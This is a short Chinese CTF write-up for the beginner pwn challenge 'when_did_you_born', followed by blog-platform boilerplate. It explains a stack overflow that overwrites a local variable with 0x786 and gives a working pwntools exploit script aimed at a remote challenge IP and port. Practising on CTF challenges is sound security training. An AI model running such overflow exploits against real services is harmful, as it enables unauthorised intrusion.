新手练习03-when_did_you_born

image.png

栈溢出覆盖v5为0x786就行了

image.png

v5相对于v4的偏移为8
exp:

#-*-coding:utf-8 -*-
from pwn import *
# p = process('./when_did_you_born')
p = remote("111.198.29.45","30999")
system_catflag = 0x400906
p.recvuntil("?")
p.sendline("1925")   #随便一个数字通过第一关就行
# gdb.attach(p,"b *0x4008CD")
p.recvuntil("Name?")
#0x786
#0x00000786
payload = 8*'a' + p32(0x00000786)
p.sendline(payload)
p.interactive()
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • HTML+CSS(47-72)
    问答题47 /72 常见浏览器兼容性问题与解决方案? 参考答案 (1)浏览器兼容问题一:不同浏览器的标签默认的外补...
    _Yfling阅读 14,687评论 1 92
  • 操作系统知识点
    1. 基础知识 1.1、 基本概念、 功能 冯诺伊曼体系结构1、计算机处理的数据和指令一律用二进制数表示2、顺序执...
    yunpiao阅读 10,885评论 1 22
  • 赴约
    天气昏蒙蒙的,乌云密布,阴沉至极。大大的雨滴伴着咆哮过的雷声砸地而下。路面...
    蓝风子阅读 2,784评论 0 3
  • 名人TODAY漫画秀3月14日
    诚艺信阅读 1,423评论 0 0
  • 心有多静,福有多深
    ​​我们都是时间的过客。人生,空手而来,必然空手而归。属于自己的风景,从来不曾错过;不是自己的风景,永远只是路过。...
    qqjia阅读 1,495评论 0 0